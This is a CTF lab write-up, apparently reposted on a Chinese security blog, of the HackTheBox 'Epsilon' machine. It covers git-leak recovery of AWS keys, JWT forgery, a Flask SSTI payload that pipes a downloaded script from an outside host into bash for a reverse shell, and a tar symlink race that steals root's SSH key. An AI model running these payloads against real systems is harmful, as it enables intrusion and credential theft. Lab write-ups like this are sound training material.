[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…

2025-03-12 71 0

Information Gathering

IP Address Opening Ports
10.10.11.134 TCP:22,80,5000

$ ip='10.10.11.134'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.41 (Ubuntu)
5000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
|_http-title: Costume Shop

Git leak && AWS AKSK && AWS Lambda cli && Function Information Leakage && JWT secret leak

$ dirb http://10.10.11.134

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图

$ git-dumper http://10.10.11.134/.git/ /tmp/res

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图1

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图2

# echo '10.10.11.134 epsilon.htb cloud.epsilon.htb'>>/etc/hosts

# server.py
#!/usr/bin/python3

import jwt
from flask import *

app = Flask(__name__)
secret = '<secret_key>'

def verify_jwt(token,key):
	try:
		username=jwt.decode(token,key,algorithms=['HS256',])['username']
		if username:
			return True
		else:
			return False
	except:
		return False

@app.route("/", methods=["GET","POST"])
def index():
	if request.method=="POST":
		if request.form['username']=="admin" and request.form['password']=="admin":
			res = make_response()
			username=request.form['username']
			token=jwt.encode({"username":"admin"},secret,algorithm="HS256")
			res.set_cookie("auth",token)
			res.headers['location']='/home'
			return res,302
		else:
			return render_template('index.html')
	else:
		return render_template('index.html')

@app.route("/home")
def home():
	if verify_jwt(request.cookies.get('auth'),secret):
		return render_template('home.html')
	else:
		return redirect('/',code=302)

@app.route("/track",methods=["GET","POST"])
def track():
	if request.method=="POST":
		if verify_jwt(request.cookies.get('auth'),secret):
			return render_template('track.html',message=True)
		else:
			return redirect('/',code=302)
	else:
		return render_template('track.html')

@app.route('/order',methods=["GET","POST"])
def order():
	if verify_jwt(request.cookies.get('auth'),secret):
		if request.method=="POST":
			costume=request.form["costume"]
			message = '''
			Your order of "{}" has been placed successfully.
			'''.format(costume)
			tmpl=render_template_string(message,costume=costume)
			return render_template('order.html',message=tmpl)
		else:
			return render_template('order.html')
	else:
		return redirect('/',code=302)
app.run(debug='true')
# track_api_CR_148.py
import io
import os
from zipfile import ZipFile
from boto3.session import Session


session = Session(
    aws_access_key_id='<aws_access_key_id>',
    aws_secret_access_key='<aws_secret_access_key>',
    region_name='us-east-1',
    endpoint_url='http://cloud.epsilon.htb')
aws_lambda = session.client('lambda')


def files_to_zip(path):
    for root, dirs, files in os.walk(path):
        for f in files:
            full_path = os.path.join(root, f)
            archive_name = full_path[len(path) + len(os.sep):]
            yield full_path, archive_name


def make_zip_file_bytes(path):
    buf = io.BytesIO()
    with ZipFile(buf, 'w') as z:
        for full_path, archive_name in files_to_zip(path=path):
            z.write(full_path, archive_name)
    return buf.getvalue()


def update_lambda(lambda_name, lambda_code_path):
    if not os.path.isdir(lambda_code_path):
        raise ValueError('Lambda directory does not exist: {0}'.format(lambda_code_path))
    aws_lambda.update_function_code(
        FunctionName=lambda_name,
        ZipFile=make_zip_file_bytes(path=lambda_code_path))

1.AWS key未知
2.server.py在端口5000运行
3.在track_api_CR_148.py中aws_lambda = session.client('lambda')=>使用 AWS SDK for Python(Boto3) 创建一个 AWS Lambda 客户端

AWS Lambda 是 Amazon Web Services(AWS)提供的 无服务器计算服务,允许你运行代码而不需要管理服务器。在 Lambda 中,你只需编写代码,并上传至 Lambda 服务。AWS 会在有事件发生时自动运行代码并按需分配资源。

泄露AWS Key

$ git log -p --all

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图3

aws_access_key_id='AQLA5M37BDN6FJP76TDC',
aws_secret_access_key='OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A',

1.配置AWS

$ aws configure

AWS Access Key ID [None]: AQLA5M37BDN6FJP76TDC
AWS Secret Access Key [None]: OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A
Default region name [None]: us-east-1
Default output format [None]: json

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图4

2.列出aws lambda服务的函数

$ aws --endpoint-url=http://cloud.epsilon.htb lambda list-functions

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图5

3.查看costume_shop_v1函数

$ aws --endpoint-url=http://cloud.epsilon.htb lambda get-function --function-name=costume_shop_v1

http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图6

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图7

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图8

RrXCv`mrNe!K!4+5`wYq
$ python3 -c 'import jwt; print("Cookie: auth="+jwt.encode({"username": "admin", "password": "admin"}, "RrXCv`mrNe!K!4+5`wYq", algorithm="HS256"))'

http://epsilon.htb:5000/home

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图9

Flask SSTI

$ whatweb http://epsilon.htb:5000/home --cookie='auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA'

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图10

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图11

POST /order HTTP/1.1
Host: epsilon.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://epsilon.htb:5000
Connection: close
Referer: http://epsilon.htb:5000/order
Cookie: auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA
Upgrade-Insecure-Requests: 1

costume={{request.application.__globals__.__builtins__.__import__('os').popen('curl+10.10.16.33/reverse.sh|bash').read()}}&q=fff&addr=dddd

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图12

User.txt

e1c8605ea5b043a7fc870cadea41d42a

Privilege Escalation:tar -h && ln hijack

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图13

这个脚本备份了 /var/www/app/ 目录,生成一个 tar 压缩包并计算其 SHA1 校验和,然后将压缩包和校验和一起打包到另一个压缩文件中,最后清空了原始备份文件夹 /opt/backups/。

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图14

注意:这里即使在/var/www/app/创建ln软链接,也将无法指定root的ssh私钥。由于tar缺少-h参数将会造成这种情况....tar如果使用了 -h 或 --dereference 选项,则tar才会解引用符号链接。

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图15

/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"中,可以通过劫持/opt/backups/checksum来间接备份root文件

$ ls -la /var/backups/web_backups/; while ! [ -e /opt/backups/checksum ]; do :; done; rm -rf /opt/backups/checksum && ln -sf /root/.ssh/id_rsa /opt/backups/checksum;ls -la /var/backups/web_backups/

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图16

[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图17

Root.txt


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

大模型安全警报:你的AI客服正在泄露客户银行卡号
HTB-Devvortex-WriteUp
WEB漏洞——越权
新型SectopRAT木马利用Cloudflare验证系统攻击Windows用户
医疗行业网络安全现状令人担忧
2025年全球网络安全支出预计增长12.2%

发布评论